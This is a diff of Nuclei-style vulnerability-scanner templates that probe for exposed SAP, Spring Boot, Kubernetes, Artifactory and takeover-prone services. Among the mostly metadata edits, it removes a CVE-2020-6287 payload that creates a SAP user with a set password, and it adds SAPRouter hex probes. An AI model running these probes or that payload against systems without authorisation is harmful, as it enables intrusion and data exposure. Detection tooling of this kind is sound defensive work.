   name: Generic LFI Test
-  author: geeknik & unstabl3
+  author: geeknik,unstabl3
   severity: high
   description: A generic test for Local File Inclusion
   tags: fuzz,lfi

helpers/payloads/CVE-2020-6287.xml

@@ -1 +0,0 @@
-<root><user><JavaOrABAP>java</JavaOrABAP><username>projectdiscover</username><password>proj3ctD1$c0v3ry</password><userType></userType></user></root>

miscellaneous/apple-app-site-association.yaml

@@ -4,6 +4,7 @@ info:
   name: Apple app site association for harvesting end points
   author: panch0r3d
   severity: info
+  tags: misc
 
 requests:
   - method: GET
@@ -11,16 +12,25 @@ requests:
       - "{{BaseURL}}/.well-known/apple-app-site-association"
       - "{{BaseURL}}/well-known/apple-app-site-association"
       - "{{BaseURL}}/apple-app-site-association"
+
     redirects: true
-    max-redirects: 2
+    max-redirects: 1
-    headers:
+
-      User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
     matchers-condition: and
     matchers:
-      - type: regex
+      - type: word
-        regex:
+        words:
-          - '(a|A)(p|P)(p|P)(l|L)(i|I)(n|N)(k|K)(s|S)'
+          - 'applinks'
+          - 'appID'
+          - 'paths'
         part: body
+        condition: and
+
+      - type: word
+        words:
+          - 'application/json'
+        part: header
+
       - type: status
         status:
           - 200

miscellaneous/dir-listing.yaml

@@ -2,7 +2,7 @@ id: dir-listing
 
 info:
   name: Directory listing enabled
-  author: _harleo & pentest_swissky
+  author: _harleo,pentest_swissky
   severity: info
   tags: misc
 

miscellaneous/email-extractor.yaml

@@ -1,20 +1,16 @@
-id: email-address-extraction
+id: email-extractor
 
 info:
-  name: Extract Email addresses
+  name: Email Extractor
   author: panch0r3d
   severity: info
+  tags: misc,email
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}"
 
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "[a-zA-Z0-9-_.]{4,}@[A-Za-z0-9_-]+[.](com|org|net|io|gov|co|co.uk|com.mx|com.br|com.sv|co.cr|com.gt|com.hn|com.ni|com.au|com.cn)"
     extractors:
       - type: regex
         part: body

misconfiguration/aem/aem-groovyconsole.yaml

@@ -2,7 +2,7 @@ id: aem-groovyconsole
 
 info:
   name: AEM Groovy console enabled
-  author: twitter.com/Dheerajmadhukar
+  author: Dheerajmadhukar
   severity: critical
   description: Groovy console is exposed, RCE is possible.
   reference: https://hackerone.com/reports/672243

misconfiguration/artifactory-anonymous-deploy.yaml

@@ -1,27 +1,29 @@
 id: artifactory-anonymous-deploy
 
 info:
-  name: Artifactory repos with anonymous deploy permissions
+  name: Artifactory anonymous deploy
   reference: https://www.errno.fr/artifactory/Attacking_Artifactory.html
   author: panch0r3d
   severity: high
+  tags: artifactory
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/artifactory/ui/repodata?deploy=true"
-    headers:
+
-      User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
     matchers-condition: and
     matchers:
-      - type: regex
+      - type: word
-        regex:
+        words:
-          - '(repoList).*?["].*["]'
+          - '"repoKey"'
-          - '(repoTypesList).*?["].*["]'
         part: body
-    extractors:
+
-      - type: regex
+      - type: status
-        part: body
+        status:
-        regex:
+          - 200
-          - '(repoTypesList).*?["].*["]'
+
-          - '(repoList).*?["].*["]'
+      - type: word
+        words:
+          - "application/json"
+        part: header

misconfiguration/django-debug-detect.yaml

@@ -2,7 +2,7 @@ id: django-debug
 
 info:
   name: Django Debug Method Enabled
-  author: dhiyaneshDK & hackergautam
+  author: dhiyaneshDK,hackergautam
   severity: medium
   tags: django,debug
 

misconfiguration/druid-monitor.yaml

@@ -1,7 +1,7 @@
 id: druid-monitor
 info:
   name: Druid Monitor Unauthorized Access
-  author: 0h1in9e @ohlinge
+  author: ohlinge
   severity: high
   tags: druid,unauth
 

misconfiguration/exposed-docker-api.yaml

@@ -2,7 +2,7 @@ id: exposed-docker-api
 
 info:
   name: Exposed Docker API
-  author: furkansenan & dwisiswant0
+  author: furkansenan,dwisiswant0
   severity: info
   tags: docker,unauth,devops
 

misconfiguration/firebase-urls.yaml

@@ -1,27 +0,0 @@
-id: firebase-urls
-
-info:
-  name: Find firebaseio urls to check for security permissions
-  author: panch0r3d
-  severity: info
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
-    redirects: true
-    max-redirects: 5
-    headers:
-      User-Agent: "Mozilla UACanary12345"
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - ".*?(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?"
-        part: body
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - "([^]|[']|[ ]|[:]|http)*(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])"
-          - "([^]|[']|[ ]|[:]|http)*(d|D)(a|A)(t|T)(a|A)(b|B)(a|A)(s|S)(e|E).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])"

misconfiguration/front-page-misconfig.yaml

@@ -2,7 +2,7 @@ id: front-page-misconfig
 
 info:
   name: FrontPage configuration information discloure
-  author: JTeles & pikpikcu
+  author: JTeles,pikpikcu
   severity: info
   reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications
 

misconfiguration/java-melody-exposed.yaml

@@ -2,7 +2,7 @@ id: java-melody-exposed
 
 info:
   name: JavaMelody Monitoring Exposed
-  author: dhiyaneshDK & thomas_from_offensity
+  author: dhiyaneshDK,thomas_from_offensity
   severity: medium
   description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session.
   reference: |

misconfiguration/kubernetes-pods.yaml

@@ -2,7 +2,7 @@ id: kubernetes-pods-api
 
 info:
   name: Kubernetes Pods API
-  author: ilovebinbash & geeknik & 0xtavian
+  author: ilovebinbash,geeknik,0xtavian
   severity: critical
   description: When the service port is available, anyone can execute commands inside the container. See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration.
   reference: https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/

misconfiguration/sap/sap-netweaver-info-leak.yaml

@@ -0,0 +1,25 @@
+id: sap-netweaver-info-leak
+
+info:
+  name: SAP NetWeaver ICM Info page leak
+  author: randomstr1ng
+  description: Detection of SAP NetWeaver ABAP Webserver /public/info page
+  severity: medium
+  tags: sap,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sap/public/info"
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "RFC_SYSTEM_INFO.Response"
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "<RFCDEST>.*</RFCDEST>"

misconfiguration/server-status-localhost.yaml

@@ -2,7 +2,7 @@ id: server-status-localhost
 
 info:
   name: Server Status Disclosure
-  author: pdteam & geeknik
+  author: pdteam,geeknik
   severity: low
   tags: apache,debug
 

misconfiguration/shell-history.yaml

@@ -2,7 +2,7 @@ id: shell-history
 
 info:
   name: Shell History
-  author: pentest_swissky & geeknik
+  author: pentest_swissky,geeknik
   severity: low
   description: Discover history for bash, ksh, sh, and zsh
   tags: config

misconfiguration/springboot/springboot-configprops.yaml

@@ -2,7 +2,7 @@ id: springboot-configprops
 
 info:
   name: Detect Springboot Configprops Actuator
-  author: that_juan_ & dwisiswant0 & wdahlenb
+  author: that_juan_,dwisiswant0,wdahlenb
   severity: low
   description: Sensitive environment variables may not be masked
   tags: springboot,disclosure

misconfiguration/springboot/springboot-env.yaml

@@ -2,7 +2,7 @@ id: springboot-env
 
 info:
   name: Detect Springboot Env Actuator
-  author: that_juan_ & dwisiswant0 & wdahlenb
+  author: that_juan_,dwisiswant0,wdahlenb
   severity: low
   description: Sensitive environment variables may not be masked
   tags: springboot,disclosure

misconfiguration/springboot/springboot-heapdump.yaml

@@ -2,7 +2,7 @@ id: springboot-heapdump
 
 info:
   name: Detect Springboot Heapdump Actuator
-  author: that_juan_ & dwisiswant0 & wdahlenb
+  author: that_juan_,dwisiswant0,wdahlenb
   severity: critical
   description: Environment variables and HTTP requests can be found in the HPROF
   tags: springboot,disclosure

misconfiguration/springboot/springboot-httptrace.yaml

@@ -2,7 +2,7 @@ id: springboot-httptrace
 
 info:
   name: Detect Springboot httptrace
-  author: that_juan_ & dwisiswant0 & wdahlenb
+  author: that_juan_,dwisiswant0,wdahlenb
   severity: low
   description: View recent HTTP requests and responses
   tags: springboot,disclosure

misconfiguration/springboot/springboot-loggers.yaml

@@ -2,7 +2,7 @@ id: springboot-loggers
 
 info:
   name: Detect Springboot Loggers
-  author: that_juan_ & dwisiswant0 & wdahlenb
+  author: that_juan_,dwisiswant0,wdahlenb
   severity: low
   tags: springboot,disclosure
 

misconfiguration/springboot/springboot-mappings.yaml

@@ -2,7 +2,7 @@ id: springboot-mappings
 
 info:
   name: Detect Springboot Mappings Actuator
-  author: that_juan_ & dwisiswant0 & wdahlenb
+  author: that_juan_,dwisiswant0,wdahlenb
   severity: low
   description: Additional routes may be displayed
   tags: springboot,disclosure

misconfiguration/springboot/springboot-trace.yaml

@@ -2,7 +2,7 @@ id: springboot-trace
 
 info:
   name: Detect Springboot Trace Actuator
-  author: that_juan_ & dwisiswant0 & wdahlenb
+  author: that_juan_,dwisiswant0,wdahlenb
   severity: low
   description: View recent HTTP requests and responses
   tags: springboot,disclosure

misconfiguration/unauthenticated-nacos-access.yaml

@@ -2,7 +2,7 @@ id: unauthenticated-nacos-access
 
 info:
   name: Unauthenticated Nacos access v1.x
-  author: taielab & @pikpikcu
+  author: taielab,pikpikcu
   severity: critical
   issues: https://github.com/alibaba/nacos/issues/4593
   tags: nacos,unauth

network/sap-router-info-leak.yaml

@@ -0,0 +1,24 @@
+id: sap-router-info-leak
+
+info:
+  name: SAPRouter - Routing information leak
+  author: randomstr1ng
+  severity: critical
+  tags: network,sap
+
+network:
+  - inputs:
+      - data: 00000022524f555445525f41444d002802000000000000000000000000000000000000000000
+        type: hex
+
+    host:
+      - "{{Hostname}}"
+      - "{{Hostname}}:3299"
+    read-size: 2048
+
+    matchers:
+      - type: word
+        words:
+          - "Routtab"
+          - "Working directory"
+          - "SAProuter Connection Table"

network/sap-router.yaml

@@ -0,0 +1,22 @@
+id: sap-router
+
+info:
+  name: SAPRouter Detection
+  author: randomstr1ng
+  severity: info
+  tags: network,sap
+
+network:
+  - inputs:
+      - data: 57484f415245594f553f0a
+        type: hex
+
+    host:
+      - "{{Hostname}}"
+      - "{{Hostname}}:3299"
+    read-size: 1024
+
+    matchers:
+      - type: word
+        words:
+          - "SAProuter"

network/unauth-ftp.yaml

@@ -2,7 +2,7 @@ id: unauth-ftp
 
 info:
   name: FTP Anonymous Login
-  author: Celesian ( @C3l3si4n )
+  author: C3l3si4n
   severity: medium
   reference: https://tools.ietf.org/html/rfc2577
   tags: network,ftp

takeovers/acquia-takeover.yaml

@@ -2,7 +2,7 @@ id: acquia-takeover
 
 info:
   name: Acquia Takeover Detection
-  author: pdcommunity
+  author: pdteam
   severity: info
   tags: takeover
   reference: https://github.com/EdOverflow/can-i-take-over-xyz

takeovers/aftership-takeover.yaml

@@ -2,7 +2,7 @@ id: aftership-takeover
 
 info:
   name: Aftership Takeover Detection
-  author: pdcommunity
+  author: pdteam
   severity: high
   tags: takeover
   reference: https://github.com/EdOverflow/can-i-take-over-xyz

takeovers/agilecrm-takeover.yaml

@@ -2,7 +2,7 @@ id: agilecrm-takeover
 
 info:
   name: agilecrm takeover detection
-  author: pdcommunity
+  author: pdteam
   severity: high
   tags: takeover
   reference: https://github.com/EdOverflow/can-i-take-over-xyz

takeovers/aha-takeover.yaml

@@ -2,7 +2,7 @@ id: aha-takeover
 
 info:
   name: Aha Takeover Detection
-  author: pdcommunity
+  author: pdteam
   severity: high
   tags: takeover
   reference: https://github.com/EdOverflow/can-i-take-over-xyz

takeovers/airee-takeover.yaml

@@ -2,7 +2,7 @@ id: airee-takeover
 
 info:
   name: Airee Takeover Detection
-  author: pdcommunity
+  author: pdteam
   severity: high
   tags: takeover
   reference: https://github.com/EdOverflow/can-i-take-over-xyz

takeovers/anima-takeover.yaml

@@ -2,7 +2,7 @@ id: anima-takeover
 
 info:
   name: Anima Takeover Detection
-  author: pdcommunity
+  author: pdteam
   severity: high
   tags: takeover
   reference: https://github.com/EdOverflow/can-i-take-over-xyz

takeovers/aws-bucket-takeover.yaml

@@ -2,7 +2,7 @@ id: aws-bucket-takeover
 
 info:
   name: AWS Bucket Takeover Detection
-  author: pdcommunity
+  author: pdteam
   severity: high
   tags: takeover,aws
   reference: https://github.com/EdOverflow/can-i-take-over-xyz

takeovers/bigcartel-takeover.yaml

@@ -2,7 +2,7 @@ id: bigcartel-takeover
 
 info:
   name: Bigcartel Takeover Detection
-  author: pdcommunity
+  author: pdteam
   severity: high
   tags: takeover
   reference: https://github.com/EdOverflow/can-i-take-over-xyz

takeovers/bitbucket-takeover.yaml

@@ -2,7 +2,7 @@ id: bitbucket-takeover
 
 info:
   name: Bitbucket Takeover Detection
-  author: pdcommunity
+  author: pdteam
   severity: high
   tags: takeover
   reference: https://github.com/EdOverflow/can-i-take-over-xyz

takeovers/brightcove-takeover.yaml

@@ -2,7 +2,7 @@ id: brightcove-takeover
 
 info:
   name: brightcove takeover detection
-  author: pdcommunity
+  author: pdteam
   severity: high
   tags: takeover
   reference: https://github.com/EdOverflow/can-i-take-over-xyz